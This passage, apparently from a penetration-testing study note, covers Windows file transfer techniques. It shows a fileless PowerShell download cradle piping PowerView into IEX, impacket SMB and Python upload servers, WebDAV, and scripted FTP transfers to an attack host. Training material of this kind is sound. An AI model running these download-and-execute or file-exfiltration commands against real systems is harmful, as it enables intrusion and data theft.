Note: It's not always possible to use this method because cmd.exe has a maximum string length of 8191 characters. And also web shell may error because of this large strings.
Opposite Operation
I explained above how to do encoding in Linux and decoding in Powershell, now I'll explain opposite: Encode in Powershell and decode in Linux
In any version of PowerShell, the System.Net.WebClient class can be used to download a file over HTTP, HTTPS or FTP. The following table describes WebClient methods for downloading data from a resource.
PowerShell DownloadString - Fileless Method. Fileless attacks work by using some operationg system functions to download the payload and execute it directly. Instead of downloading a PowerShell script to disk, we can run it directly in memory using the Invoke-Expression cmdlet or the alias IEX
PS C:\venator17> Invoke-WebRequest https://<ip>/PowerView.ps1 | IEX
Invoke-WebRequest : The response content cannot be parsed because the Internet Explorer engine is not available, or Internet Explorer's first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again.
At line:1 char:1
+ Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/P ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotImplemented: (:) [Invoke-WebRequest], NotSupportedException
+ FullyQualifiedErrorId : WebCmdletIEDomNotSupportedException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
PS C:\carnifex17> Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | IEX
PowerShell doesn't have a built-in upload fucntions, so we need to use Invoke-WebRequest. or Invoke-RestMethod. Also we can use uploadserver module for Python, to install it we should use:
pip3 install uploadserver
Turn On Web Server with Upload
python3 -m uploadserver
PowerShell Script to Upload a File to Python Upload Server
But in some scenarios there would be an error, which forbids us unauthentificated guest access, so we could creat a smb server with authentification
Create the SMB Server with a Username and Password
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
Mount the SMB Server with Username and Password
C:\venator17> net use n: \\192.168.220.133\share /user:test test
Uploads
SMB Uploads will be more tricky because companies usually block uploads to SMB, cause it could cause a huge problem. BUUUT we could use HTTP or HTTPS protocol in return. It's because when you use SMB, it will first attempt to connect using SMB protocol, and if there's no SMB share available, it'll try to connect using HTTP. But for this we need WebDav protocol, it enables a webserver to behave like a fileserver, which we need. First you need to install it
Connecting to the Webdav Share. DavWWWRoot isn't a folder, it's a special keyword that tells WebDAV that we are connection to the root of WebDav server. You could use any existing directory when you are connecting, as example sharefolder
Create a Command File for the FTP Client and Download the Target File
C:\venator17> echo open 13.13.13.13 > ftpcommand.txt
C:\venator17> echo USER anonymous >> ftpcommand.txt
C:\venator17> echo binary >> ftpcommand.txt
C:\venator17> echo GET file.txt >> ftpcommand.txt
C:\venator17> echo bye >> ftpcommand.txt
C:\venator17> ftp -v -n -s:ftpcommand.txt
ftp> open 13.13.13.13
Log in with USER and PASS first.
ftp> USER anonymous
ftp> GET file.txt
ftp> bye
C:\venator17>more file.txt
This is a test file
Uploads
For this we would also use peftpdlib but we need to specify the option --write to allow clients to upload files to our attack host.
